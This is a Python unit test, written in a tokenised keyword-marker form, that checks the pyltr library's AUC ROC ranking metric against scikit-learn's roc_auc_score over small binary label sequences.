"user_labels")<block_end><block_end>
""" Testing for AUC ROC metric. """<import_from_stmt>. helpers<import_stmt>itertools<import_stmt>numpy<as>np<import_stmt>pyltr<import_stmt>sklearn.metrics<class_stmt>TestAUCROC(helpers.TestMetric)<block_start><def_stmt>get_metric self<block_start><return>pyltr.metrics.AUCROC()<block_end><def_stmt>get_queries_with_values self<block_start><for_stmt>i range(0 7)<block_start><for_stmt>tup itertools.product(*([(0 1)]<times>i))<block_start><if_stmt>any(e<ne>tup[0]<for>e tup)<block_start><yield>(np.array(tup) sklearn.metrics.roc_auc_score(tup range(i 0 -1)))<block_end><else_stmt><block_start><yield>np.array(tup) 0.0<block_end><block_end><block_end><block_end><def_stmt>get_queries self<block_start><for_stmt>i range(0 7)<block_start><for_stmt>tup itertools.product(*([(0 1)]<times>i))<block_start><yield>np.array(tup)<block_end><block_end><block_end><block_end>